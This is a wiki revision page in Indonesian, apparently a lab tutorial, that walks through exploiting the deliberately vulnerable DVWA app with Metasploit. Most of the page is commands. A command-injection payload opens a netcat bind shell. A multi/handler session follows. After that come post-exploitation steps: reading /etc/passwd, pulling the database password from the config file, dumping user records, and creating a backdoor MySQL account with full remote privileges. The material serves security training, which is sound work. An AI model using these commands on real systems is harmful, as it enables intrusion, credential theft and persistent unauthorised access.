Difference between revisions of "DVWA: Exploit menggunakan Metasploit"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 41: | Line 41: | ||
whoami | whoami | ||
| − | grep | + | grep www-data /etc/passwd |
| − | grep | + | grep www-data /etc/group |
Revision as of 03:59, 4 May 2017
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Siapkan NetCat
Masuk ke DVWA Command Injection, lakukan
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dimana 192.168.0.100 adalah IP address server DVWA
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.100 exploit
Cek password
whoami grep www-data /etc/passwd grep www-data /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/dvwa/config cat /var/www/html/dvwa/config/config.inc.php
Explorasi database
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
Buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD